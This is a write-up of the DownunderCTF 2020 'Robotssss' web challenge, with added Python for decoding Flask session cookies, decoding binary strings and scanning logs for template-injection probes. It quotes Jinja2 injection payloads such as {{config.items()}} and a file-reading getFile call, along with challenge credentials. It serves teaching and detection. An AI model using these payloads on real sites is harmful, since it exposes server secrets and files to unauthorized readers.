DownunderCTF 2020: Robotssss.
The challenge opens on a login page. The title hints at robots, so the first thing to check is robots.txt, but there is no such file???
Then register, log in, and there are two Info posts:
Robot rebels!
Human developers think that they are cool by using robots.txt to tell search engine crawlers which pages or files the crawler can or can't request from your site. But this is insulting to us robots. Let's get them back by using humans.txt. This should stop human crawlers from finding pages or files on our website.
From yours truly, Robot developers
Hey robot devs!
Delete this post the second all you robot devs see this (we can't let any humans see this). I left the secret flag at /s3cr3t_p4th/robot_fl4g.txt. Remember to delete this post ASAP!
From yours truly, Robot Admin
The first post tells us that this challenge does not use robots.txt but humans.txt instead; the second tells us the flag is at /s3cr3t_p4th/robot_fl4g.txt. Looking at humans.txt, it points to /4dm1n_Cr3ds, and visiting that returns: Good day robot rebel. The admin cred is 6zMLV46JRp6kAmTs3nx5AG4WJgYeY. This value does not change with the client IP, the time, or anything else; it is a fixed value.
After registering, the cookie is in Flask session format: .eJwtzjkSwjAMAMC_uE4h67Kdz2QkWxpoE1Ix_B0Kqm33XY4843qU_XXesZXjucpe0Mci8EaVQ0iDsJJFQ8PKNN3HDxlRlyBQxARPyC4py2guM56hicDsoq1VyZzdIJW9A3BiD87pmtJTVMdyc1bLptYTKlLZyn3F-c-UzxeSJi9T.X3sYtg.o0JYCdYEusTA8S939UhbeGYqhmY
Decoded, it is: {"_fresh":true,"_id":"2b9d30b7314e536e3213ae72a2143cbb914359e1d5203eec0bf0f85f5da3cdaa4ce6f2044b567715ffc8a0f64b8004f28e4fcb6f58f5669dbab46af76a8f0123","user_id":"2"}
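The cookie above is a Flask session cookie, which is signed but not encrypted: anyone holding it can read the session data exactly as the writeup did, and only the HMAC keyed with the application's SECRET_KEY stops a client from editing its own session. The following is an added example, not code from the writeup or the challenge: a stdlib-only reader and verifier that follows the itsdangerous layout Flask uses (URL-safe base64 without padding, a leading dot for zlib-compressed payloads, a big-endian timestamp segment, HMAC-SHA1 with the 'cookie-session' salt and 'hmac' key derivation). The cookie constant is the one transcribed above; the secret key and session contents used for the round trip are constructed.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Session cookie as transcribed from the writeup (extraction whitespace removed).
WRITEUP_COOKIE = (
    ".eJwtzjkSwjAMAMC_uE4h67Kdz2QkWxpoE1Ix_B0Kqm33XY4843qU_XXesZXjucpe0Mci8EaVQ0iD"
    "sJJFQ8PKNN3HDxlRlyBQxARPyC4py2guM56hicDsoq1VyZzdIJW9A3BiD87pmtJTVMdyc1bLptYT"
    "KlLZyn3F-c-UzxeSJi9T.X3sYtg.o0JYCdYEusTA8S939UhbeGYqhmY"
)

SALT = b"cookie-session"  # Flask's fixed salt for the session signer


def _b64encode(raw: bytes) -> str:
    """URL-safe base64 with the '=' padding stripped, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64decode(text: str) -> bytes:
    """Inverse of _b64encode: restore the padding, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _split(cookie: str):
    """Return the (payload, timestamp, signature) segments of a session cookie."""
    payload, timestamp, signature = cookie.rsplit(".", 2)
    return payload, timestamp, signature


def decode_session(cookie: str) -> dict:
    """Read the session data WITHOUT checking the signature.

    A leading '.' on the payload means it was zlib-compressed before base64.
    The client can always do this: the data is signed, not encrypted.
    """
    payload, _, _ = _split(cookie)
    compressed = payload.startswith(".")
    raw = _b64decode(payload[1:] if compressed else payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def session_timestamp(cookie: str) -> int:
    """Unix time at which the cookie was signed (big-endian int, base64)."""
    _, timestamp, _ = _split(cookie)
    return int.from_bytes(_b64decode(timestamp), "big")


def _derive_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def _sign(secret_key: bytes, value: str) -> str:
    mac = hmac.new(_derive_key(secret_key), value.encode("ascii"), hashlib.sha1)
    return _b64encode(mac.digest())


def verify_session(cookie: str, secret_key: bytes) -> bool:
    """Recompute the HMAC over 'payload.timestamp' and compare in constant time."""
    payload, timestamp, signature = _split(cookie)
    expected = _sign(secret_key, payload + "." + timestamp)
    return hmac.compare_digest(expected, signature)


def build_session(data: dict, secret_key: bytes, timestamp: int) -> str:
    """Produce a cookie in the same layout; used here only to create fixtures."""
    body = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(body)
    if len(compressed) < len(body) - 1:      # same threshold itsdangerous uses
        payload = "." + _b64encode(compressed)
    else:
        payload = _b64encode(body)
    ts_bytes = timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big")
    value = payload + "." + _b64encode(ts_bytes)
    return value + "." + _sign(secret_key, value)


if __name__ == "__main__":
    print("writeup cookie signed at:", session_timestamp(WRITEUP_COOKIE))
    try:
        print("writeup session:", decode_session(WRITEUP_COOKIE))
    except (zlib.error, ValueError) as exc:   # transcription of the payload may be damaged
        print("could not decode writeup payload:", exc)
    key = b"constructed-secret-key"           # constructed; not the challenge's key
    session = {"_fresh": True, "_id": "ab" * 64, "user_id": "2"}
    cookie = build_session(session, key, 1601902774)
    print(decode_session(cookie), verify_session(cookie, key))
```

The timestamp segment X3sYtg of the writeup's cookie decodes to 1601902774; `decode_session` needs no key at all, which is why nothing secret should ever be stored in a client-side Flask session.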
Then I noticed that the URL for viewing the two posts is /robot_blogs/1; changing that 1 to anything else returns a 404.
Later, pressing F12 on the page that hints at the flag location, I found a hidden noscript block: <noscript><p class="magic">0110011001101100001101000110011100101110011101000111100001110100</p></noscript>
It decodes to fl4g.txt. Likewise, the page that hints at humans.txt has one too, which decodes to humen.txt. humen.txt points to /Bender, where there is an image. Download it and look at the EXIF data: the Artist field holds another binary string, 011000010110010001101101011010010110111000111010010101000110100001101001011100110010110101001001011100110010110101010100011010000110010100101101010000010110010001101101011010010110111000101101010100000110000101110011011100110111011101101111011100100110010000101101010110000100010000100001
which decodes to admin:This-Is-The-Admin-Password-XD!. So let's log in.
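Both hidden strings are plain 8-bit ASCII written out in binary. The following added example (not from the writeup) pulls out text that only appears inside <noscript> elements with the standard-library HTML parser, decodes any binary runs it finds, and applies the same decoder to the EXIF Artist value quoted above; the HTML wrapper around the page's noscript block is constructed, the two bit strings are the ones on the page.

```python
import re
from html.parser import HTMLParser

# Constructed HTML page; the <noscript> block itself is the one from the writeup.
NOSCRIPT_HTML = (
    '<html><body><p>Delete this post ASAP!</p>'
    '<noscript><p class="magic">'
    '0110011001101100001101000110011100101110011101000111100001110100'
    '</p></noscript></body></html>'
)

# EXIF Artist value from the writeup's /Bender image.
EXIF_ARTIST = (
    "0110000101100100011011010110100101101110001110100101010001101000011010010111"
    "0011001011010100100101110011001011010101010001101000011001010010110101000001"
    "0110010001101101011010010110111000101101010100000110000101110011011100110111"
    "011101101111011100100110010000101101010110000100010000100001"
)

BINARY_RUN = re.compile(r"(?:[01]{8}){4,}")  # at least four whole bytes


def decode_binary_ascii(bits: str) -> str:
    """Turn a string of 8-bit binary groups into ASCII text."""
    digits = re.sub(r"[^01]", "", bits)       # tolerate spaces or line breaks
    if not digits or len(digits) % 8:
        raise ValueError("bit string length is not a multiple of 8")
    octets = bytes(int(digits[i:i + 8], 2) for i in range(0, len(digits), 8))
    return octets.decode("ascii")


class NoscriptText(HTMLParser):
    """Collect text nodes that sit inside <noscript> elements only."""

    def __init__(self):
        super().__init__()
        self.depth = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "noscript":
            self.depth += 1

    def handle_endtag(self, tag):
        if tag == "noscript" and self.depth:
            self.depth -= 1

    def handle_data(self, data):
        if self.depth:
            self.chunks.append(data)


def find_hidden_binary(html: str):
    """Return the decoded form of every binary run hidden in <noscript> blocks."""
    parser = NoscriptText()
    parser.feed(html)
    parser.close()
    decoded = []
    for chunk in parser.chunks:
        for run in BINARY_RUN.findall(chunk):
            decoded.append(decode_binary_ascii(run))
    return decoded


if __name__ == "__main__":
    print(find_hidden_binary(NOSCRIPT_HTML))    # ['fl4g.txt']
    print(decode_binary_ascii(EXIF_ARTIST))     # admin:This-Is-The-Admin-Password-XD!
```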
After logging in we are allowed to submit input and get a result back, which obviously points to SSTI. 16 came back as 16, good, so read {{config.items()}} directly. Nothing we wanted in there. So go read the flag instead. Then it turned out that _ [ ] are filtered, so that path is closed. Looking carefully back at the config.items() output: ([('ENV', 'production'), ('DEBUG', False), ('TESTING', False), ('PROPAGATE_EXCEPTIONS', None), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SECRET_KEY', "app.jinja_env.globals['getFile'] = getFile(fileName)"), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(days=31)), ('USE_X_SENDFILE', False), ('SERVER_NAME', None), ('APPLICATION_ROOT', '/'), ('SESSION_COOKIE_NAME', 'session'), ('SESSION_COOKIE_DOMAIN', False), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_HTTPONLY', True), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_SAMESITE', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('MAX_CONTENT_LENGTH', None), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(seconds=43200)), ('TRAP_BAD_REQUEST_ERRORS', None), ('TRAP_HTTP_EXCEPTIONS', False), ('EXPLAIN_TEMPLATE_LOADING', False), ('PREFERRED_URL_SCHEME', 'http'), ('JSON_AS_ASCII', True), ('JSON_SORT_KEYS', True), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('JSONIFY_MIMETYPE', 'application/json'), ('TEMPLATES_AUTO_RELOAD', None), ('MAX_COOKIE_SIZE', 4093), ('SQLALCHEMY_DATABASE_URI', 'sqlite:////db/templatedb.db'), ('SQLALCHEMY_TRACK_MODIFICATIONS', False), ('DATABASE', '../templatedb.db'), ('SQLALCHEMY_BINDS', None), ('SQLALCHEMY_NATIVE_UNICODE', None), ('SQLALCHEMY_ECHO', False), ('SQLALCHEMY_RECORD_QUERIES', None), ('SQLALCHEMY_POOL_SIZE', None), ('SQLALCHEMY_POOL_TIMEOUT', None), ('SQLALCHEMY_POOL_RECYCLE', None), ('SQLALCHEMY_MAX_OVERFLOW', None), ('SQLALCHEMY_COMMIT_ON_TEARDOWN', False), ('SQLALCHEMY_ENGINE_OPTIONS', {})])
there is an app.jinja_env.globals['getFile'], so let's try using getFile to read the file: {{getFile('/fl4g.txt')}}
Gotcha.
flag{23798dd1-af76-4caf-aec3-c5c8a97903f4}
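A defender's view of the last step: the text box rendered user input as a Jinja2 template, and the character filter on _ [ ] did nothing to stop {{config.items()}} or the getFile call. The following added example (not part of the writeup) scans web access logs for SSTI probing by URL-decoding every query parameter and flagging template syntax, arithmetic probes such as 4*4, Jinja2 built-in globals such as config and request, dunder access, and function calls. The log lines, the /admin path and the input parameter are constructed for this example; the probe values mirror what the writeup describes.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (combined log format). The "input" parameter
# stands in for the challenge's text box; none of this is real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2020:13:39:34 +0000] "GET /admin?input=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Oct/2020:13:40:02 +0000] "GET /admin?input=%7B%7B4*4%7D%7D HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Oct/2020:13:40:41 +0000] "GET /admin?input=%7B%7Bconfig.items()%7D%7D HTTP/1.1" 200 4093 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Oct/2020:13:41:10 +0000] "GET /admin?input=%7B%7BgetFile('/fl4g.txt')%7D%7D HTTP/1.1" 200 80 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2020:13:42:00 +0000] "GET /robot_blogs/1 HTTP/1.1" 200 1200 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# {{ ... }} expressions and {% ... %} statements, the Jinja2 delimiters
TEMPLATE_SYNTAX = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Secondary indicators evaluated on the text inside the template delimiters
INDICATORS = [
    ("math_probe", re.compile(r"\b\d+\s*[*+\-/]\s*\d+\b")),
    ("jinja_global", re.compile(r"\b(config|self|request|lipsum|cycler|joiner|namespace)\b")),
    ("dunder", re.compile(r"__")),
    ("call", re.compile(r"\w+\s*\(")),
]


def fully_unquote(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (double encoding is a common evasion)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str):
    """Return the indicator tags for one parameter value, or [] if benign."""
    value = fully_unquote(value)
    hits = TEMPLATE_SYNTAX.findall(value)
    if not hits:
        return []
    tags = ["template_syntax"]
    inner = " ".join(hits)
    for name, pattern in INDICATORS:
        if pattern.search(inner):
            tags.append(name)
    return tags


def scan_log(text: str):
    """Walk the log and report every request whose query carries template syntax."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                findings.append({
                    "line": lineno,
                    "ip": match.group("ip"),
                    "param": param,
                    "value": fully_unquote(value),
                    "tags": tags,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Detection on template delimiters catches the probing sequence the writeup walks through (arithmetic check, then config.items(), then the discovered global) regardless of which characters an input filter blocks. The durable fix sits in the application: hand user data to the template as a context variable (render_template('page.html', value=user_input)) instead of building template source from it; a blacklist of _ [ ] leaves every built-in global and every function registered in jinja_env.globals reachable, which is exactly how this challenge fell.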